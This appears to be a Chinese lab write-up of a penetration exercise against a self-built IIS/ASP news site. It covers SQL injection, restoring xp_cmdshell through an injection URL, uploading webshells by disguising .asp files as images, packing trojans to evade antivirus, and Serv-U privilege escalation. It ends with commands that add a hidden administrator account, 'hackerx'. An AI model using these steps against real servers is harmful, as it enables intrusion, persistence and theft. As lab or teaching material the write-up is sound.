1. 环境配置
1.1 操作安装配置(Win 2003)
1.2 IIS+ SQL Server+ACCESS
下载IIS组件、SQL Server、Access安装包并安装
1.3 OYY网站安装配置
1.3.1 ASP+ACCESS
① 下载OYY网站源码,放在C盘根目录下
② 发布网站:打开IIS管理器,新建网站->输入网站描述(OYY)->指定网站的IP地址为210.28.164.211->选中C盘根目录下的文件夹,勾上允许匿名访问->选择权限为:读取、运行脚本、写入、浏览->完成
1.3.2 ASP+SQL Server
① 下载OYY网站源码,放在C盘根目录下
② 发布网站过程同上
③ 与数据库连接:
1、 打开SQL企业管理器,新建一个数据库
2、 打开SQL企业管理器工具里的 SQL查询分析器,将文件包里的oyayanews.sql 里的代码复制到SQL查询分析器窗口里执行,既建立数据库表完成
3、 安装完成,登陆后台进行相关设置
2. 目标扫描
获取操作系统版本、IIS服务器等信息
2.1 运用工具:Web Vulnerability Scanner 7
2.2 探测结果:
Microsoft IIS6.0
利用and 1=(select @@VERSION)命令,得到:
操作系统版本:sever 2003 SP2// 数据库版本:MSSQL 2000
3. 网站注入检测
工具:啊D注入工具
注入点检测结果:
4. 获取网站系统权限(ASP+ACCESS)
获取网站后台网址及管理员用户名和密码(已加密)
PS:这里要考虑一种情况,就是获得管理员的密码,但是密码已经被加密,短时间内无法破解的情形,这时我们需要考虑能否绕过管理员的登录页面,直接进入后台,目前部分网站仍然存在着简单的cookies验证漏洞,我们可以轻易的绕过去;
5. 获取Web Shell
① SQL版本:
(1) 利用啊D注入工具中cmd上传工具将xp_cmdshell恢复
或者使用手工注入:
URL+;EXECmaster.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
(2) 读取C盘目录,获取网站的目录
(3) 上传小马至网站目录
(4) 连接到小马地址,上传大马
PS:这里为什么不直接上传大马呢?通过几次的写入,我发现上传大马,大马一直出错,写入有偏差…所以先写入小马,相对来说小马的大小要小得多,更加容易写入。
(5) 链接至大马,顺利拿下webshell
② ACESS版本:
1、 利用上述扫描到的后台地址和网站后台用户名和密码进入网站后台
2、 在上传新闻图片地方把“小马.asp”文件后缀名改成jpg,当作图片文件上传
3、 利用数据库后台的备份功能,将“小马.jpg”文件重命名成“小马.asp”
4、 链接至小马,然后步骤如①中(4)、(5),也能顺利拿下webshell
PS:当然这个上传小马或者是大马的这个过程也会出现一些意外情况,比如服务器端安装了杀毒软件,直接将小马或大马删除了,这个时候我们可以对准备上传的木马文件进行一些加壳操作,使得它能够免杀。
6. 获取系统管理员权限
通过Server-U本地提权漏洞获取操作系统的管理员权限
利用大马中提供的server-U提权代码获取管理员权限:
PS:当然,这种方法只是适用于装有server—U的机器上
常用命令收集:
1、 恢复XP_cmdshell:
execsp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'(电脑端)
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'(注入点URL)
2、提权操作:
cmd /c net user hackerx hackerx /add & net localgroupadministrators hackerx /add
net user hackerx hackerx /add 建立一个名字和密码都为hackerx的用户
net localgroup administrators hackerx /add 把hackerx加为系统管理员